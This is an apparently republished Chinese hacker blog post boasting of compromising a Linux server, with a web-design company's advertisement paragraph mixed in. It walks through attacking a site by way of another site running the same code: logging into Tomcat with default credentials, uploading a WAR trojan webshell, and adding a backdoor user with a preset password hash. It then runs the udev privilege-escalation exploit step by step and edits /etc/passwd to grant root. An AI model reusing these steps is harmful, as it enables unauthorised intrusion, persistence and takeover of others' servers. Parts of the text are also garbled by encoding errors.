今天成功利用udev搞定一個(gè)linux肉雞,爽呀,沒(méi)想到我的人品已經(jīng)好到這個(gè)地步了……
成都創(chuàng)新互聯(lián)長(zhǎng)期為1000+客戶提供的網(wǎng)站建設(shè)服務(wù)�,團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年�,關(guān)注不同地域���、不同群體�����,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù)��;打造開(kāi)放共贏平臺(tái)����,與合作伙伴共同營(yíng)造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境���。為硚口企業(yè)提供專業(yè)的成都做網(wǎng)站����、成都網(wǎng)站建設(shè)、成都外貿(mào)網(wǎng)站建設(shè)����,硚口網(wǎng)站改版等技術(shù)服務(wù)�。擁有十余年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開(kāi)發(fā)。
今天本來(lái)和ay520一起檢測(cè)一個(gè)網(wǎng)站的�,無(wú)奈網(wǎng)站太過(guò)去強(qiáng)大,沒(méi)有發(fā)現(xiàn)漏洞�����,于是我就開(kāi)始了迂回攻擊戰(zhàn)術(shù)����,什么是迂回攻擊?我就來(lái)小介紹一下:
通常我們攻擊一個(gè)網(wǎng)站的時(shí)候�,由于不了解網(wǎng)站源碼結(jié)構(gòu),也沒(méi)有常見(jiàn)的漏洞���,我們就可以先找出這個(gè)網(wǎng)站源碼的一些特征字符�,然后利用google搜索
和這個(gè)網(wǎng)站一樣源碼的站�����,要攻擊的站可能沒(méi)有漏洞,但是我們搜索到的站不一定沒(méi)有漏洞�����,可能是配置上面的問(wèn)題等����,然后加以利用,成功得到shell以后
我們就可以利用shell來(lái)查看網(wǎng)站的源碼�,然后再返回去攻擊目標(biāo)站點(diǎn),這樣就是我所謂的迂回了��,當(dāng)然也可以是社工網(wǎng)站管理員在其它網(wǎng)站或者是論壇上面的
注冊(cè)用戶名和密碼然后再回來(lái)測(cè)試目標(biāo)站點(diǎn)�����,最終拿下目標(biāo)站點(diǎn)就OK了��。費(fèi)話不多說(shuō)了��,下面就開(kāi)始我今天的入侵滲透之旅了……
由于目標(biāo)站點(diǎn)沒(méi)有漏洞����,配置上面的漏洞也沒(méi)有,通過(guò)google搜索我找到一個(gè)和他一樣源碼的網(wǎng)站http://www.xxx.com:9999/wcm/loginpage.htm 然后進(jìn)行了常用密碼的
猜解�,但是也沒(méi)有發(fā)現(xiàn)弱密碼等漏洞,于是去掉wcm以及后面的,直接http://www.xxx.com:9999/ 結(jié)果發(fā)現(xiàn)是tomcat ���,經(jīng)測(cè)試用戶名和密碼為:admin/null 成功進(jìn)入以
后上傳war木馬����,最后得到迂回攻擊的網(wǎng)站的webshell 運(yùn)行命令uname -a 得到服務(wù)器的內(nèi)核版本Linux www.xxx.com 2.6.18-
128.el5 #1 SMP Wed Jan 21 10:44:23 EST 2009 i686 i686 i386 GNU/Linux 由于linux的2.6內(nèi)核出了一個(gè)udev本地溢出漏洞����,首先看一下webshell的運(yùn)行權(quán)限����,命令
id,結(jié)果人品爆發(fā)了uid=0(root) gid=0(root) groups=0(root)�����,1(bin)�����,2(daemon)�����,3(sys),4(adm)�,6(disk),10(wheel) context=user_u:system_r:unconfined_t�����,是root權(quán)
限�,既然是root權(quán)限,那么我們可以通過(guò)webshell來(lái)建立一個(gè)用戶����,然后利用putty來(lái)連接,進(jìn)行本地溢出提權(quán)……但是通過(guò)常用的useradd username添加的用戶密碼
為空���,如果想利用passwd username來(lái)設(shè)置密碼的話����,我們的webshell是無(wú)法輸入密碼的�����,我們就郁悶使用他的參數(shù)�����,-p來(lái)操作了,結(jié)果搜索運(yùn)行如下命令:useradd -
p $1$Bj.BPMBM$pr3Vte2A9DW6jCzljcZNT1 liang //-p 后面的一串字符串是我在虛擬機(jī)中添加用戶����,然后復(fù)制他的密碼來(lái)做為這里的密碼,這樣我就成功添加一個(gè)用
戶liang 打開(kāi)putty 然后輸入用戶名和密碼���,連接���,一切ok,權(quán)限為$ 為普通用戶���,下面就利用udev的溢出來(lái)進(jìn)行提權(quán)了。
我本來(lái)按照此文所寫來(lái)進(jìn)行溢出 http://www.waitalone.cn/post/466.html 結(jié)果不成功�,經(jīng)查實(shí),可能是溢出代碼有問(wèn)題�����,于是我就直接打開(kāi)
http://www.milw0rm.com/exploits/8478 在putty中運(yùn)行如下命令:
[liang@www ~]$ vi test 粘貼上面的代碼
[liang@www ~]$ wq 保存并退出
[liang@www ~]$chmod 777 test 添加任意用戶可執(zhí)行權(quán)限
[liang@www ~]$ps ax|grep udev|grep -v grep|awk {'print $1'} 獲得udev進(jìn)程號(hào)��,結(jié)果為479��,然后減1作為test參數(shù)
[liang@www ~]$sh test 478 結(jié)果返回
sh-3.2$ 返回這個(gè)說(shuō)明不成功��,我們多試幾次
sh-3.2$ sh test 478 這樣我試了三次,還是不行
sh-3.2$ sh test 476 這次成功了�����,我看到了可愛(ài)的#����,哈哈 人品爆炸了
然后vi /etc/passwd 把用戶名liang的 uid和gid改為0,這樣liang 就為root 權(quán)限了���,哈哈�。搞定收工�!
文章名稱:迂回攻擊戰(zhàn)術(shù)搞定linux肉雞
文章鏈接:
http://uogjgqi.cn/article/dhcdgih.html
